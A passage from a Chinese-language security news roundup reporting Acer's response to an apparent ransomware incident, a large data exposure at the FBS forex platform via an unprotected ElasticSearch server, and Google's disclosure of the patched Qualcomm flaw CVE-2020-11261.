宏碁在接受共同社采访时表示检测到异常,已采取措施,公司不打算支付赎金,已向调查机关报告了情况。


2、网上交易经纪商数据泄露,数十亿FBS记录被曝光

FBS 外汇交易平台上数百万人的机密信息,包括姓名、密码、电子邮件地址、护照号码、居民ID、信用卡、金融交易记录等,被白帽团队 WizCase发现存在泄露风险。


FBS 是成立于 2009 年的国际外汇交易公司,在全球 190 个国家/地区拥有超过 40 万合作伙伴和 1600 万名交易员。FBS 是世界上 最受欢迎的在线外汇交易平台之一。截至 2021 年 1 月,Android 系统的 FBS 应用在 Google Play 中的下载次数已超过一百万次。

640 (1).png

FBS 有一个不安全的 ElasticSearch 对外暴露,其中包含近 20 TB 的数据(超过 160 亿条记录)。该服务器没有任何密码保护,其中的财务数据可以自由访问,这是极其危险的。


未加密的密码随处可见:

640 (2).png


这些数据对攻击者来说价值特别巨大,可以用于身份盗用和欺诈、网络诈骗、信用卡诈骗、信息勒索、仿冒钓鱼、账户接管甚至危及人身安全。



3、高通芯片曝0day漏洞,可致安卓用户内存损坏

在芯片紧缺的时候,高通芯片曝出了0day漏洞,这无疑是雪上加霜。

640 (3).png


3月23日,谷歌披露了一个影响使用高通芯片组的安卓终端0day漏洞,攻击者可以利用该漏洞定向发起攻击。目前,该漏洞已修复。


该漏洞编号为CVE-2020-11261(CVSS评分8.4),和高通公司图形组件中的 "不当输入验证 "问题有关。当攻击者设计的应用程序请求访问设备大容量内存时,该漏洞可能会被利用,从而引发内存损坏。


值得庆幸是,该漏洞的访问形式是 "本地",因此利用该漏洞需要对设备进行本地访问。换言之,攻击者需要对智能设备进行物理访问,或者使用水坑、恶意代码传播引发攻击链等其他手段。



4、高性能服务提供商Stratus遭勒索软件攻击